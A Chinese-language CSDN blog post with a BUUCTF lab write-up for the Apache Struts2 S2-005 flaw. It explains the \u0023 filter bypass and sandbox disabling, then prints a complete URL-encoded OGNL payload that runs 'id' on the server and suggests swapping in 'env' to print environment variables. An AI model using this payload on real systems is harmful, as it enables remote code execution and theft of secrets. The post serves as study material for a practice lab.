buuctf [struts2]s2-005

最新推荐文章于 2022-03-30 21:15:30 发布
最新推荐文章于 2022-03-30 21:15:30 发布
阅读量452 收藏 1
点赞数 2
分类专栏: buuctf real 文章标签: struts2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/115040071
版权

漏洞简介
通过unicode 编码 \u0023 绕过struts对#的过滤,再通过设置xwork.MethodAccessor.denyMethodExecution 为false 和memberAccess.allowStaticMethodAccess为true 来绕过沙盒
https://blog.csdn.net/Fly_hps/article/details/85000125
在这里插入图片描述

POC
/example/HelloWorld.action?%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27id%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29

将远程命令 改为env打印环境变量
在这里插入图片描述
在这里插入图片描述

exploitsec
关注
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
qq_51577576的博客
10-14 1073
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870) s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
struts2 批量扫描 s2-005-----s2-046
11-02
批量扫描,支持文件,支持单url,支持多线程。少量误报,可扩展,可修改。
struts2系列-Real-BUUCTF平台
~airrudder~
04-24 3867
本篇内容 [PHP]XXE [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce 上一篇 | 目录 | 下一篇 [PHP]XXE 打开就显示phpinfo,直接搜索flag就出来了。 不知道是不是环境坏了。 [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce ...
struts2批量扫描s2-005-----s2-046
06-13
自动化扫描大量网站是否存在s2-005-----s2-046
buuctf [struts2]s2-007
qq_1873822的博客
03-17 606
具体漏洞原理 https://xz.aliyun.com/t/2684 age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行。后端用代码拼接 “’” + value + “’” 然后对其进行 OGNL 表达式解析,比较类似SQL注入单引号闭合,插入语句,官方修复的时候也跟sql注入比较相似,escape 对单引号转义. poc ’ + (#_memberA.
buuctf [struts2]s2-012
qq_1873822的博客
03-21 398
漏洞简介 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如: <package name="S2-012" extends="struts-default"> <action name="user" class="com.demo.action.UserAction"> <result name="redirect" type="redirect">/index.jsp?n
struts2反序列化漏洞,存在s2-005s2-016、s2-016_3、s2-017
08-28
首先,s2-005漏洞(CVE-2012-0881)是2012年发现的一个严重问题,它涉及到Struts2的OGNL(Object-Graph Navigation Language)表达式在反序列化过程中的不当处理。OGNL是一种强大的表达式语言,允许动态访问和操作...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
Struts2 漏洞 S2-045 修补方法 Struts2 是一个基于 Java 的 Web 应用程序框架,广泛应用于企业级应用程序中。然而,Struts2 中存在着一些漏洞,例如 S2-045 漏洞,该漏洞可能会导致严重的安全问题。今天,我们将...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
buuctf [struts2]s2-001
qq_1873822的博客
03-16 662
漏洞原理 Struts 2 框架的表单验证机制( Validation )主要依赖于两个拦截器:validation 和 workflow。validation 拦截器工作时,会根据 XML 配置文件来创建一个验证错误列表;workflow 拦截器工作时,会根据 validation 拦截器所提供的验证错误列表,来检查当前所提交的表单是否存在验证错误。 在默认配置下,如果 workflow 拦截器检测到用户所提交的表单存在任何一个验证错误,workflow 拦截器都会将用户的输入进行解析处理,随即返回并显示
S2-005 远程代码执行漏洞检测与利用
a1b2c3是弱口令
12-11 2894
s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法...
buuctf [struts2]s2-013
qq_1873822的博客
03-16 846
漏洞简介 Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参.
墨者学院 - Apache Struts2远程代码执行漏洞(S2-005)复现
多崎巡礼的博客
09-17 2096
K8大佬神器一出 done
Struts2漏洞S2-005复现笔记
hklearner的博客
03-30 2952
Struts2漏洞S2-001复现笔记 漏洞原理 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻
S2-045之不能再当脚本小子之格物致知之知行合一
shy的博客
03-05 501
发现奇怪告警 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Type: {\u0028\u0023\u006e\u0069\u006b\u0065\u003d\u0027multipart/form-data\u0027\u0029\u002e\u0028\u0023\u0064\u006d\u003d\u0040\u006f\u0067\u006e\u006c\u002e\u004f\u0067\u006e\u
s2-005远程执行漏洞靶机练写poc和exp
rlenew的博客
12-04 1671
在安装好环境后,页面如下 靶机的ip为192.168.6.217 S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访问Ognl的上下文对象必须要使用#符号,S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过。 S2-005则是绕过官方的安全配置(禁止静态方法调用和类方法执行),再次造成漏洞。 在github上有一段没有回显的poc验证 (%27%5cu0023_memberAccess[%5c%27allowStaticM
s2系列——s2-005复现
qq_54030686的博客
03-01 4109
残缺版本exp 先采用能够爆出路径的payload,验证网址是否存在s2-005漏洞,然后在使用执行代码的payload进行利用,这里不再赘述,但是不同博主的文章下payload肯定不尽相同,有可能会出现无法利用的payload,不用担心,换一个就好 靶场使用vulhub中s2-005靶场 使用正则表达式判断回显,代码来自github上struts.py,经过些许修改,可以正常执行命令,展示 进入docker容器后,实在根目录的相应文件夹下创建文件,但是不晓得反弹shell的逻辑是啥,使用bash反弹s
s2-005漏洞解决方法
最新发布
09-09
S2-005漏洞是指在使用Struts 2框架的Web应用程序中存在的一种安全风险,攻击者可以通过构造恶意请求利用该漏洞来执行任意的命令。 要解决S2-005漏洞,首先需要确认Web应用程序是否使用了受漏洞影响的Struts 2版本。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值